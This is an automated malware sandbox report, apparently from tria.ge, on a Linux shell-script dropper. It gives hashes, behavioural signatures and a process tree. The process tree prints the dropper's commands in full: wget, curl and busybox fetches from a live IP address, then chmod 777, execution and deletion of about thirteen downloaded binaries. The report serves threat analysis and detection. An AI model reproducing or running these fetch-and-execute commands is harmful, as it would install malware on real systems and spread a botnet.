Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
19s -
max time network
20s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
18/10/2024, 02:27
Static task
static1
Behavioral task
behavioral1
Sample
aa39944ef6e2e4df4e2baf780eabac483975413142be9aee68cdcd069ad605f6.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
aa39944ef6e2e4df4e2baf780eabac483975413142be9aee68cdcd069ad605f6.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
aa39944ef6e2e4df4e2baf780eabac483975413142be9aee68cdcd069ad605f6.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
aa39944ef6e2e4df4e2baf780eabac483975413142be9aee68cdcd069ad605f6.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
aa39944ef6e2e4df4e2baf780eabac483975413142be9aee68cdcd069ad605f6.sh
-
Size
10KB
-
MD5
5df47113727a7b75e9023a09ffc504f2
-
SHA1
fda1c0a9a5ae07a024ec2e0297ce177c6ac5ad6f
-
SHA256
aa39944ef6e2e4df4e2baf780eabac483975413142be9aee68cdcd069ad605f6
-
SHA512
858e3b26bc40be548a382d6c9a350b657cab7aedf61fcd04d28c302a0d31d1afb3b1ca6188461cf8051ab9620206bd174c64ec7d538ad532e36734f5088512ce
-
SSDEEP
192:eWYAVCOCC4urk0c75B4rWYAVCOs5B4STV:edCrrk0c75B4f5B4STV
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 707 chmod 727 chmod 754 chmod 769 chmod 781 chmod 793 chmod 799 chmod 819 chmod 669 chmod 775 chmod 787 chmod 805 chmod 813 chmod -
Executes dropped EXE 13 IoCs
ioc pid Process /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N 671 wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 709 yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU 728 v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU /tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O 756 JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O /tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ 770 ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ /tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4 776 OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4 /tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP 782 dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP /tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U 788 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U /tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx 794 M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx /tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ 800 UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ /tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP 806 NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP /tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf 814 oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf /tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU 820 NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU -
Checks CPU configuration 1 TTPs 13 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 13 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx curl File opened for modification /tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP curl File opened for modification /tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf curl File opened for modification /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N curl File opened for modification /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 curl File opened for modification /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU curl File opened for modification /tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O curl File opened for modification /tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ curl File opened for modification /tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4 curl File opened for modification /tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP curl File opened for modification /tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U curl File opened for modification /tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ curl File opened for modification /tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU curl
Processes
-
/tmp/aa39944ef6e2e4df4e2baf780eabac483975413142be9aee68cdcd069ad605f6.sh/tmp/aa39944ef6e2e4df4e2baf780eabac483975413142be9aee68cdcd069ad605f6.sh1⤵PID:637
-
/bin/rm/bin/rm bins.sh2⤵PID:639
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵PID:641
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:659
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵PID:667
-
-
/bin/chmodchmod 777 wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- File and Directory Permissions Modification
PID:669
-
-
/tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N./wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- Executes dropped EXE
PID:671
-
-
/bin/rmrm wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵PID:672
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵PID:673
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:674
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵PID:679
-
-
/bin/chmodchmod 777 yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵
- File and Directory Permissions Modification
PID:707
-
-
/tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3./yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵
- Executes dropped EXE
PID:709
-
-
/bin/rmrm yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵PID:710
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵PID:711
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:718
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵PID:725
-
-
/bin/chmodchmod 777 v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵
- File and Directory Permissions Modification
PID:727
-
-
/tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU./v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵
- Executes dropped EXE
PID:728
-
-
/bin/rmrm v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵PID:729
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵PID:730
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:731
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵PID:732
-
-
/bin/chmodchmod 777 JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O./JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵
- Executes dropped EXE
PID:756
-
-
/bin/rmrm JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵PID:757
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵PID:759
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:764
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵PID:768
-
-
/bin/chmodchmod 777 ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵
- File and Directory Permissions Modification
PID:769
-
-
/tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ./ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵
- Executes dropped EXE
PID:770
-
-
/bin/rmrm ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵PID:771
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵PID:772
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:773
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵PID:774
-
-
/bin/chmodchmod 777 OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵
- File and Directory Permissions Modification
PID:775
-
-
/tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4./OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵
- Executes dropped EXE
PID:776
-
-
/bin/rmrm OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵PID:777
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵PID:778
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵PID:780
-
-
/bin/chmodchmod 777 dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵
- File and Directory Permissions Modification
PID:781
-
-
/tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP./dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵
- Executes dropped EXE
PID:782
-
-
/bin/rmrm dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵PID:783
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵PID:784
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:785
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵PID:786
-
-
/bin/chmodchmod 777 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U./4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵PID:789
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵PID:790
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:791
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵PID:792
-
-
/bin/chmodchmod 777 M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵
- File and Directory Permissions Modification
PID:793
-
-
/tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx./M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵
- Executes dropped EXE
PID:794
-
-
/bin/rmrm M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵PID:795
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵PID:796
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵PID:798
-
-
/bin/chmodchmod 777 UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ./UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵
- Executes dropped EXE
PID:800
-
-
/bin/rmrm UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵PID:801
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵PID:802
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:803
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵PID:804
-
-
/bin/chmodchmod 777 NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP./NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵
- Executes dropped EXE
PID:806
-
-
/bin/rmrm NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵PID:807
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵PID:809
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:811
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵PID:812
-
-
/bin/chmodchmod 777 oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf./oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵
- Executes dropped EXE
PID:814
-
-
/bin/rmrm oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵PID:815
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵PID:816
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵PID:818
-
-
/bin/chmodchmod 777 NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU./NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵
- Executes dropped EXE
PID:820
-
-
/bin/rmrm NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵PID:821
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe2⤵PID:822
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97